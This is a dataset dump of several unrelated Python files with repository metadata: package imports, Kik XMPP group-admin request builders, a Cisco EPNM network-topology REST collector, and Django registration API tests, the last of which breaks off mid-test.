d96dfa811482eee067f346386a2181ec514625f4
|
[
"MIT"
] | 5
|
2017-05-05T01:52:31.000Z
|
2019-04-20T21:06:05.000Z
|
kwat/internet/__init__.py
|
KwatME/ccal
|
d96dfa811482eee067f346386a2181ec514625f4
|
[
"MIT"
] | 5
|
2017-07-17T18:55:54.000Z
|
2019-02-02T04:46:19.000Z
|
from .download import download
from .download_and_extract import download_and_extract
from .get_name import get_name
| 29.25
| 54
| 0.871795
| 18
| 117
| 5.333333
| 0.388889
| 0.25
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 117
| 3
| 55
| 39
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c9a1f5f0f71d0b0971214921d0514538cb3c3a89
| 381
|
py
|
Python
|
ml-agents-envs/mlagents_envs/side_channel/__init__.py
|
LoopySantos27/ml-agents
|
2b175c8ea65d75814654812e1357d15be8b40d3f
|
[
"Apache-2.0"
] | 13,653
|
2017-09-19T15:56:02.000Z
|
2022-03-31T18:55:07.000Z
|
ml-agents-envs/mlagents_envs/side_channel/__init__.py
|
LoopySantos27/ml-agents
|
2b175c8ea65d75814654812e1357d15be8b40d3f
|
[
"Apache-2.0"
] | 3,623
|
2017-09-20T02:50:20.000Z
|
2022-03-31T06:37:25.000Z
|
ml-agents-envs/mlagents_envs/side_channel/__init__.py
|
LoopySantos27/ml-agents
|
2b175c8ea65d75814654812e1357d15be8b40d3f
|
[
"Apache-2.0"
] | 4,130
|
2017-09-19T17:36:34.000Z
|
2022-03-31T12:54:55.000Z
|
from mlagents_envs.side_channel.incoming_message import IncomingMessage # noqa
from mlagents_envs.side_channel.outgoing_message import OutgoingMessage # noqa
from mlagents_envs.side_channel.side_channel import SideChannel # noqa
from mlagents_envs.side_channel.default_training_analytics_side_channel import ( # noqa
DefaultTrainingAnalyticsSideChannel, # noqa
) # noqa
| 47.625
| 88
| 0.847769
| 45
| 381
| 6.844444
| 0.377778
| 0.214286
| 0.207792
| 0.25974
| 0.38961
| 0.301948
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107612
| 381
| 7
| 89
| 54.428571
| 0.905882
| 0.076115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c9ba65174f5da1faf959f408213523455c717c88
| 4,990
|
py
|
Python
|
kik_unofficial/datatypes/xmpp/group_adminship.py
|
3dik/kik-bot-api-unofficial
|
78073fc8af50bf27b8c261533f9cde30f745412e
|
[
"MIT"
] | 120
|
2017-07-07T14:07:14.000Z
|
2022-02-22T03:14:23.000Z
|
kik_unofficial/datatypes/xmpp/group_adminship.py
|
TheGreatCodeholio/kik-bot-api-unofficial
|
c1f02b735dcb3e1d1b5e29a1ca04dd2f66557248
|
[
"MIT"
] | 173
|
2017-07-07T04:31:19.000Z
|
2021-11-20T02:59:20.000Z
|
kik_unofficial/datatypes/xmpp/group_adminship.py
|
TheGreatCodeholio/kik-bot-api-unofficial
|
c1f02b735dcb3e1d1b5e29a1ca04dd2f66557248
|
[
"MIT"
] | 101
|
2017-07-11T19:43:17.000Z
|
2022-03-03T02:04:05.000Z
|
from typing import List, Union
from kik_unofficial.datatypes.xmpp.base_elements import XMPPElement
class AddToGroupRequest(XMPPElement):
def __init__(self, group_jid, peer_jid):
super().__init__()
self.group_jid = group_jid
self.peer_jid = peer_jid
def serialize(self) -> bytes:
data = ('<iq type="set" id="{}">'
'<query xmlns="kik:groups:admin">'
'<g jid="{}">'
'<m>{}</m>'
'</g>'
'</query>'
'</iq>').format(self.message_id, self.group_jid, self.peer_jid)
return data.encode()
class ChangeGroupNameRequest(XMPPElement):
def __init__(self, group_jid, new_name):
super().__init__()
self.group_jid = group_jid
self.new_name = new_name
def serialize(self) -> bytes:
data = ('<iq type="set" id="{}">'
'<query xmlns="kik:groups:admin">'
'<g jid="{}">'
'<n>{}</n>'
'</g>'
'</query>'
'</iq>').format(self.message_id, self.group_jid, self.new_name)
return data.encode()
class RemoveFromGroupRequest(XMPPElement):
def __init__(self, group_jid, peer_jid):
super().__init__()
self.group_jid = group_jid
self.peer_jid = peer_jid
def serialize(self) -> bytes:
data = ('<iq type="set" id="{}">'
'<query xmlns="kik:groups:admin">'
'<g jid="{}">'
'<m r="1">{}</m>'
'</g>'
'</query>'
'</iq>').format(self.message_id, self.group_jid, self.peer_jid)
return data.encode()
class UnbanRequest(XMPPElement):
def __init__(self, group_jid, peer_jid):
super().__init__()
self.group_jid = group_jid
self.peer_jid = peer_jid
def serialize(self) -> bytes:
data = ('<iq type="set" id="{}">'
'<query xmlns="kik:groups:admin">'
'<g jid="{}">'
'<b r="1">{}</b>'
'</g>'
'</query>'
'</iq>').format(self.message_id, self.group_jid, self.peer_jid)
return data.encode()
class BanMemberRequest(XMPPElement):
def __init__(self, group_jid, peer_jid):
super().__init__()
self.group_jid = group_jid
self.peer_jid = peer_jid
def serialize(self) -> bytes:
data = ('<iq type="set" id="{}">'
'<query xmlns="kik:groups:admin">'
'<g jid="{}">'
'<b>{}</b>'
'</g>'
'</query>'
'</iq>').format(self.message_id, self.group_jid, self.peer_jid)
return data.encode()
class LeaveGroupRequest(XMPPElement):
def __init__(self, group_jid):
super().__init__()
self.group_jid = group_jid
def serialize(self) -> bytes:
data = ('<iq type="set" id="{}">'
'<query xmlns="kik:groups:admin">'
'<g jid="{}">'
'<l />'
'</g>'
'</query>'
'</iq>').format(self.message_id, self.group_jid)
return data.encode()
class PromoteToAdminRequest(XMPPElement):
def __init__(self, group_jid, peer_jid):
super().__init__()
self.group_jid = group_jid
self.peer_jid = peer_jid
def serialize(self) -> bytes:
data = ('<iq type="set" id="{}">'
'<query xmlns="kik:groups:admin">'
'<g jid="{}">'
'<m a="1">{}</m>'
'</g>'
'</query>'
'</iq>').format(self.message_id, self.group_jid, self.peer_jid)
return data.encode()
class DemoteAdminRequest(XMPPElement):
def __init__(self, group_jid, peer_jid):
super().__init__()
self.group_jid = group_jid
self.peer_jid = peer_jid
def serialize(self) -> bytes:
data = ('<iq type="set" id="{}">'
'<query xmlns="kik:groups:admin">'
'<g jid="{}">'
'<m a="0">{}</m>'
'</g>'
'</query>'
'</iq>').format(self.message_id, self.group_jid, self.peer_jid)
return data.encode()
class AddMembersRequest(XMPPElement):
def __init__(self, group_jid, peer_jids: Union[str, List[str]]):
super().__init__()
self.group_jid = group_jid
if isinstance(peer_jids, List):
self.peer_jids = peer_jids
else:
self.peer_jids = [peer_jids]
def serialize(self) -> bytes:
items = ''.join(['<m>{}</m>'.format(jid) for jid in self.peer_jids])
data = ('<iq type="set" id="{}">'
'<query xmlns="kik:groups:admin">'
'<g jid="{}">'
'{}'
'</g>'
'</query>'
'</iq>').format(self.message_id, self.group_jid, items)
return data.encode()
| 31.582278
| 79
| 0.492585
| 538
| 4,990
| 4.282528
| 0.118959
| 0.125
| 0.140625
| 0.125
| 0.81684
| 0.784288
| 0.759549
| 0.732205
| 0.705295
| 0.705295
| 0
| 0.00121
| 0.337675
| 4,990
| 157
| 80
| 31.783439
| 0.695915
| 0
| 0
| 0.755725
| 0
| 0
| 0.172144
| 0.04509
| 0
| 0
| 0
| 0
| 0
| 1
| 0.137405
| false
| 0
| 0.015267
| 0
| 0.290076
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c9c74e4767caa6c14f24cbbb5f0e6ea580eacaa5
| 145
|
py
|
Python
|
project/confidence/utils.py
|
StealthTech/django-conf
|
bc73ef5e868a4088d962714cb63acd43393f6413
|
[
"Apache-2.0"
] | 1
|
2018-04-10T19:42:52.000Z
|
2018-04-10T19:42:52.000Z
|
project/confidence/utils.py
|
StealthTech/django-conf
|
bc73ef5e868a4088d962714cb63acd43393f6413
|
[
"Apache-2.0"
] | 7
|
2019-12-04T21:46:34.000Z
|
2022-02-10T07:59:32.000Z
|
project/confidence/utils.py
|
StealthTech/django-confidence
|
bc73ef5e868a4088d962714cb63acd43393f6413
|
[
"Apache-2.0"
] | null | null | null |
def print_formatted(s, level=0):
print('-' * level + f'—> {s}')
def input_formatted(s, level=0):
return input('-' * level + f'<— {s}')
| 20.714286
| 41
| 0.551724
| 23
| 145
| 3.478261
| 0.434783
| 0.25
| 0.375
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 0.2
| 145
| 6
| 42
| 24.166667
| 0.655172
| 0
| 0
| 0
| 0
| 0
| 0.096552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.25
| 0.75
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 8
|
4ec8834733b58a7cfe1f817718dec3b176ebd06f
| 128
|
py
|
Python
|
lib/web/pages/__init__.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 16
|
2021-08-30T07:05:28.000Z
|
2022-03-04T06:46:42.000Z
|
lib/web/pages/__init__.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 7
|
2021-08-30T01:33:52.000Z
|
2022-03-23T10:19:38.000Z
|
lib/web/pages/__init__.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 9
|
2021-08-29T21:49:03.000Z
|
2022-03-12T19:59:29.000Z
|
import lib.web.pages.background
import lib.web.pages.index_js
import lib.web.pages.web_urls
import lib.web.pages.dashstatus_json
| 32
| 36
| 0.851563
| 23
| 128
| 4.608696
| 0.434783
| 0.339623
| 0.45283
| 0.641509
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054688
| 128
| 4
| 36
| 32
| 0.876033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
14d2ba63fe407588d476bfc9d97cbc7e67632cbb
| 17,253
|
py
|
Python
|
collectioncode/collect.py
|
jbrentfoster/autosrlg
|
ee30fcb14004544f3487485c8f832830582699a4
|
[
"MIT"
] | null | null | null |
collectioncode/collect.py
|
jbrentfoster/autosrlg
|
ee30fcb14004544f3487485c8f832830582699a4
|
[
"MIT"
] | null | null | null |
collectioncode/collect.py
|
jbrentfoster/autosrlg
|
ee30fcb14004544f3487485c8f832830582699a4
|
[
"MIT"
] | null | null | null |
import collectioncode.utils
import time
import re
import json
import logging
import sys
import shutil
def runcollector(baseURL, epnmuser, epnmpassword):
logging.info("Collecting L1 nodes...")
collectL1Nodes_json(baseURL, epnmuser, epnmpassword)
logging.info("Collecting 4k nodes...")
collect4kNodes_json(baseURL, epnmuser, epnmpassword)
logging.info("Collecting L1 links...")
collectL1links_json(baseURL, epnmuser, epnmpassword)
logging.info("Collecting SRRGs...")
collectSRRGs_json(baseURL, epnmuser, epnmpassword)
logging.info("Collecting SRRG pools...")
collectSRRG_pools_json(baseURL, epnmuser, epnmpassword)
logging.info("Collecting Topological Links...")
collectTopoLinks_json(baseURL, epnmuser, epnmpassword)
collectTopoLinksPhysical_json(baseURL, epnmuser, epnmpassword)
def collectSRRGsOnly(baseURL, epnmuser, epnmpassword):
logging.info("Collecting SRRGs...")
collectSRRGs_json(baseURL, epnmuser, epnmpassword)
logging.info("Collecting SRRG pools...")
collectSRRG_pools_json(baseURL, epnmuser, epnmpassword)
def collectL1Nodes_json(baseURL, epnmuser, epnmpassword):
incomplete = True
startindex = 0
jsonmerged = {}
while incomplete:
uri = "/data/v1/cisco-resource-physical:node?product-series=Cisco Network Convergence System 2000 Series&.depth=1&.startIndex=" + str(
startindex)
jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
jsonaddition = json.loads(jsonresponse)
firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
if (lastindex - firstindex) == 99 and lastindex != -1:
startindex += 100
merge(jsonmerged, jsonaddition)
elif lastindex == -1:
incomplete = False
else:
incomplete = False
merge(jsonmerged, jsonaddition)
with open("jsongets/l1-nodes.json", 'w', encoding="utf8") as f:
# f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
with open("jsongets/l1-nodes.json", 'r', encoding="utf8") as f:
jsonresponse = f.read()
f.close()
thejson = json.loads(jsonresponse)
l1nodes = {}
i = 1
with open("jsonfiles/l1-nodes_db.json", 'w', encoding="utf8") as f:
for node in thejson['com.response-message']['com.data']['nd.node']:
if node['nd.product-series'] == "Cisco Network Convergence System 2000 Series":
nodeName = node['nd.name']
fdn = node['nd.fdn']
logging.info("Processing node " + nodeName)
try:
latitude = node['nd.latitude']
longitude = node['nd.longitude']
except KeyError:
logging.error(
"Could not get longitude or latitidude for node " + nodeName + ". Setting to 0.0 and 0.0")
latitude = {'fdtn.double-amount': 0.0, 'fdtn.units': 'DEGREES_DECIMAL'}
longitude = {'fdtn.double-amount': 0.0, 'fdtn.units': 'DEGREES_DECIMAL'}
l1nodes['Node' + str(i)] = dict(
[('Name', nodeName), ('fdn', fdn), ('Latitude', latitude), ('Longitude', longitude)])
i += 1
# f.write(json.dumps(l1nodes, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(l1nodes, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
def collect4kNodes_json(baseURL, epnmuser, epnmpassword):
incomplete = True
startindex = 0
jsonmerged = {}
while incomplete:
uri = "/data/v1/cisco-resource-physical:node?product-series=Cisco Network Convergence System 4000 Series&.startIndex=" + str(
startindex)
jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
jsonaddition = json.loads(jsonresponse)
firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
if (lastindex - firstindex) == 99 and lastindex != -1:
startindex += 100
merge(jsonmerged, jsonaddition)
elif lastindex == -1:
incomplete = False
else:
incomplete = False
merge(jsonmerged, jsonaddition)
with open("jsongets/4k-nodes.json", 'w', encoding="utf8") as f:
# f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
with open("jsongets/4k-nodes.json", 'r', encoding="utf8") as f:
jsonresponse = f.read()
f.close()
thejson = json.loads(jsonresponse)
l1nodes = {}
i = 1
with open("jsonfiles/4k-nodes_db.json", 'w', encoding="utf8") as f:
for node in thejson['com.response-message']['com.data']['nd.node']:
if node['nd.product-series'] == "Cisco Network Convergence System 4000 Series":
nodeName = node['nd.name']
fdn = node['nd.fdn']
logging.info("Processing node " + nodeName)
try:
latitude = node['nd.latitude']
longitude = node['nd.longitude']
except KeyError:
logging.error(
"Could not get longitude or latitidude for node " + nodeName + ". Setting to 0.0 and 0.0")
latitude = {'fdtn.double-amount': 0.0, 'fdtn.units': 'DEGREES_DECIMAL'}
longitude = {'fdtn.double-amount': 0.0, 'fdtn.units': 'DEGREES_DECIMAL'}
l1nodes['Node' + str(i)] = dict(
[('Name', nodeName), ('fdn', fdn), ('Latitude', latitude), ('Longitude', longitude)])
i += 1
# f.write(json.dumps(l1nodes, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(l1nodes, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
def collectL1links_json(baseURL, epnmuser, epnmpassword):
incomplete = True
startindex = 0
jsonmerged = {}
while incomplete:
uri = "/data/v1/cisco-resource-network:topological-link?topo-layer=ots-link-layer&.startIndex=" + str(
startindex)
jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
jsonaddition = json.loads(jsonresponse)
firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
if (lastindex - firstindex) == 99 and lastindex != -1:
startindex += 100
merge(jsonmerged, jsonaddition)
elif lastindex == -1:
incomplete = False
else:
incomplete = False
merge(jsonmerged, jsonaddition)
with open("jsongets/l1-links.json", 'w', encoding="utf8") as f:
# f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
with open("jsongets/l1-links.json", 'r', encoding="utf8") as f:
jsonresponse = f.read()
f.close()
thejson = json.loads(jsonresponse)
l1links = {}
i = 1
with open("jsonfiles/l1-links_db.json", 'w', encoding="utf8") as f:
for link in thejson['com.response-message']['com.data']['topo.topological-link']:
fdn = link['topo.fdn']
logging.info("Processing link " + fdn)
nodes = []
try:
endpointlist = link['topo.endpoint-list']['topo.endpoint']
except Exception as err:
logging.error("L1 link does not have valid topo.end-point-list, skipping this link: " + fdn)
continue
try:
topo_capacity = link['topo.total-capacity']
except Exception as err:
# link is not a 2k ROADM link, ignore it
continue
if len(endpointlist) > 1:
for ep in endpointlist:
endpoint = ep['topo.endpoint-ref']
node = endpoint.split('!')[1].split('=')[1]
nodes.append(node)
if len(nodes) > 1:
duplicates = False
if not duplicates:
l1links['Link' + str(i)] = dict([('fdn', fdn)])
l1links['Link' + str(i)]['Nodes'] = nodes
i += 1
# f.write(json.dumps(l1links, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(l1links, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
def collectSRRGs_json(baseURL, epnmuser, epnmpassword):
incomplete = True
startindex = 0
jsonmerged = {}
while incomplete:
uri = "/data/v1/cisco-resource-network:shared-risk-resource-group?.startIndex=" + str(startindex)
jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
jsonaddition = json.loads(jsonresponse)
firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
if (lastindex - firstindex) == 99 and lastindex != -1:
startindex += 100
merge(jsonmerged, jsonaddition)
elif lastindex == -1:
incomplete = False
else:
incomplete = False
merge(jsonmerged, jsonaddition)
with open("jsongets/SRRGs.json", 'w', encoding="utf8") as f:
# f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
def collectSRRG_pools_json(baseURL, epnmuser, epnmpassword):
incomplete = True
startindex = 0
jsonmerged = {}
while incomplete:
uri = "/data/v1/cisco-resource-network:srrg-pool?.startIndex=" + str(startindex)
jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
jsonaddition = json.loads(jsonresponse)
firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
if (lastindex - firstindex) == 99 and lastindex != -1:
startindex += 100
merge(jsonmerged, jsonaddition)
elif lastindex == -1:
incomplete = False
else:
incomplete = False
merge(jsonmerged, jsonaddition)
with open("jsongets/SRRG_pools.json", 'w', encoding="utf8") as f:
# f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
def collectTopoLinks_json(baseURL, epnmuser, epnmpassword):
incomplete = True
startindex = 0
jsonmerged = {}
while incomplete:
uri = "/data/v1/cisco-resource-network:topological-link?topo-layer=och-link-layer&.startIndex=" + str(
startindex)
jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
jsonaddition = json.loads(jsonresponse)
firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
if (lastindex - firstindex) == 99 and lastindex != -1:
startindex += 100
merge(jsonmerged, jsonaddition)
elif lastindex == -1:
incomplete = False
else:
incomplete = False
merge(jsonmerged, jsonaddition)
with open("jsongets/topo-links.json", 'w', encoding="utf8") as f:
# f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
with open("jsongets/topo-links.json", 'r', encoding="utf8") as f:
jsonresponse = f.read()
f.close()
thejson = json.loads(jsonresponse)
topolinks = {}
i = 1
with open("jsonfiles/topolinks_add_drop_db.json", 'w', encoding="utf8") as f:
for link in thejson['com.response-message']['com.data']['topo.topological-link']:
fdn = link['topo.fdn']
logging.info("Processing topological link " + fdn)
nodes = []
try:
endpointlist = link['topo.endpoint-list']['topo.endpoint']
except Exception as err:
logging.error("Topo link does not have valid topo.end-point-list, skipping this link: " + fdn)
continue
if len(endpointlist) > 1:
for ep in endpointlist:
endpoint = ep['topo.endpoint-ref']
node = endpoint.split('!')[1].split('=')[1]
ctp = endpoint.split('!')[2].split('=')[2]
entry = {'node': node, 'ctp': ctp}
nodes.append(entry)
if len(nodes) > 1:
topolinks['Link' + str(i)] = dict([('fdn', fdn)])
topolinks['Link' + str(i)]['Nodes'] = nodes
i += 1
json.dump(topolinks, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
def collectTopoLinksPhysical_json(baseURL, epnmuser, epnmpassword):
incomplete = True
startindex = 0
jsonmerged = {}
while incomplete:
uri = "/data/v1/cisco-resource-network:topological-link?topo-layer=physical-link-layer&.startIndex=" + str(
startindex)
jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
jsonaddition = json.loads(jsonresponse)
firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
if (lastindex - firstindex) == 99 and lastindex != -1:
startindex += 100
merge(jsonmerged, jsonaddition)
elif lastindex == -1:
incomplete = False
else:
incomplete = False
merge(jsonmerged, jsonaddition)
with open("jsongets/topo-links-physical.json", 'w', encoding="utf8") as f:
# f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
with open("jsongets/topo-links-physical.json", 'r', encoding="utf8") as f:
jsonresponse = f.read()
f.close()
thejson = json.loads(jsonresponse)
topolinks = {}
i = 1
with open("jsonfiles/topolinks_physical_db.json", 'w', encoding="utf8") as f:
for link in thejson['com.response-message']['com.data']['topo.topological-link']:
if isinstance(link, dict):
fdn = link['topo.fdn']
logging.info("Processing topological link " + fdn)
nodes = []
endpointlist = link['topo.endpoint-list']['topo.endpoint']
if len(endpointlist) > 1:
for ep in endpointlist:
endpoint = ep['topo.endpoint-ref']
# print "Endpoint is: " + endpoint
node = endpoint.split('!')[1].split('=')[1]
ctp = endpoint.split('!')[2].split('=')[2]
entry = {'node': node, 'ctp': ctp}
nodes.append(entry)
if len(nodes) > 1:
topolinks['Link' + str(i)] = dict([('fdn', fdn)])
topolinks['Link' + str(i)]['Nodes'] = nodes
i += 1
json.dump(topolinks, f, sort_keys=True, indent=4, separators=(',', ': '))
f.close()
def merge(a, b):
"merges b into a"
for key in b:
if key in a: # if key is in both a and b
# if isinstance(a[key],dict):
# logging.info("a[key] is a dict.")
# elif isinstance(a[key],list):
# logging.info("a[key] is a list.")
# if isinstance(b[key],dict):
# logging.info("b[key] is a dict.")
# elif isinstance(b[key],list):
# logging.info("b[key] is a list.")
if isinstance(a[key], dict) and isinstance(b[key], dict): # if the key is dict Object
merge(a[key], b[key])
elif isinstance(a[key], list) and isinstance(b[key], list):
a[key] = a[key] + b[key]
else: # if the key is not in dict a , add it to dict a
a.update({key: b[key]})
return a
| 45.046997
| 142
| 0.57619
| 1,855
| 17,253
| 5.321833
| 0.095957
| 0.050648
| 0.020057
| 0.028971
| 0.93284
| 0.902249
| 0.880369
| 0.85393
| 0.849676
| 0.845827
| 0
| 0.015621
| 0.280183
| 17,253
| 382
| 143
| 45.164921
| 0.77929
| 0.075117
| 0
| 0.776758
| 0
| 0.018349
| 0.205204
| 0.063824
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030581
| false
| 0.076453
| 0.021407
| 0
| 0.055046
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
14d3a517fa2fe056b31e1803138f147d60fa5266
| 9,047
|
py
|
Python
|
app/account/tests/test_auth_api.py
|
bondeveloper/maischool
|
16bf2afe99d26caa067b7912e88839639cf2191e
|
[
"MIT"
] | null | null | null |
app/account/tests/test_auth_api.py
|
bondeveloper/maischool
|
16bf2afe99d26caa067b7912e88839639cf2191e
|
[
"MIT"
] | null | null | null |
app/account/tests/test_auth_api.py
|
bondeveloper/maischool
|
16bf2afe99d26caa067b7912e88839639cf2191e
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.contrib.auth import get_user_model
from rest_framework.test import APIClient
from rest_framework import status
class TestAuthApi(TestCase):
# if anyones knows how to reverse this path, feel free to make edits
reg_url = '/api/v1/accounts/auth/registration/'
login_url = '/api/v1/accounts/auth/login/'
token_url = '/api/v1/accounts/auth/token/'
def setUp(self):
self.client = APIClient()
def test_user_registration_successful(self):
payload = {
"email": "testuser@bondeveloper.com",
"password1": "Qwerty!@#",
"password2": "Qwerty!@#",
"username": "testuser01",
"first_name": "Test Fistname",
"last_name": "Test Lastname"
}
res = self.client.post(self.reg_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_201_CREATED)
self.assertIn('access_token', res.data.keys())
self.assertIn('refresh_token', res.data.keys())
self.assertIn('user', res.data.keys())
self.assertEquals(res.data.get('user')['email'], payload.get('email'))
def test_user_registration_email_required(self):
payload = {
"email": "",
"password1": "Qwerty!@#",
"password2": "Qwerty!@#",
"username": "testuser01",
"first_name": "Test Fistname",
"last_name": "Test Lastname"
}
res = self.client.post(self.reg_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('email', res.data.keys())
self.assertEquals(str(res.data.get('email')[0]),
'This field may not be blank.')
def test_user_registration_username_required(self):
payload = {
"email": "testuser@bondeveloper.com",
"password1": "Qwerty!@#",
"password2": "Qwerty!@#",
"username": "",
}
res = self.client.post(self.reg_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('username', res.data.keys())
self.assertEquals(str(res.data.get('username')[0]),
'This field may not be blank.')
def test_user_registration_password1_required(self):
payload = {
"email": "testuser@bondeveloper.com",
"password1": "",
"password2": "Qwerty!@#",
"username": "testuser01",
}
res = self.client.post(self.reg_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('password1', res.data.keys())
self.assertEquals(str(res.data.get('password1')[0]),
'This field may not be blank.')
def test_user_registration_password2_required(self):
payload = {
"email": "testuser@bondeveloper.com",
"password1": "Qwerty!@#",
"password2": "",
"username": "testuser01",
}
res = self.client.post(self.reg_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('password2', res.data.keys())
self.assertEquals(str(res.data.get('password2')[0]),
'This field may not be blank.')
def test_user_registration_passwords_match(self):
payload = {
"email": "testuser@bondeveloper.com",
"password1": "Qwerty!@#",
"password2": "Qwerty#@!",
"username": "testuser01",
}
res = self.client.post(self.reg_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('non_field_errors', res.data.keys())
self.assertEquals(str(res.data.get('non_field_errors')[0]),
'The two password fields didn\'t match.')
def test_login_user_required(self):
payload = {
"email": "testuser@bondeveloper.com",
"password": "Qwerty!@#",
}
res = self.client.post(self.login_url, payload, format='json')
self.assertEquals(res.status_code, status.HTTP_400_BAD_REQUEST)
self.assertIn('non_field_errors', res.data.keys())
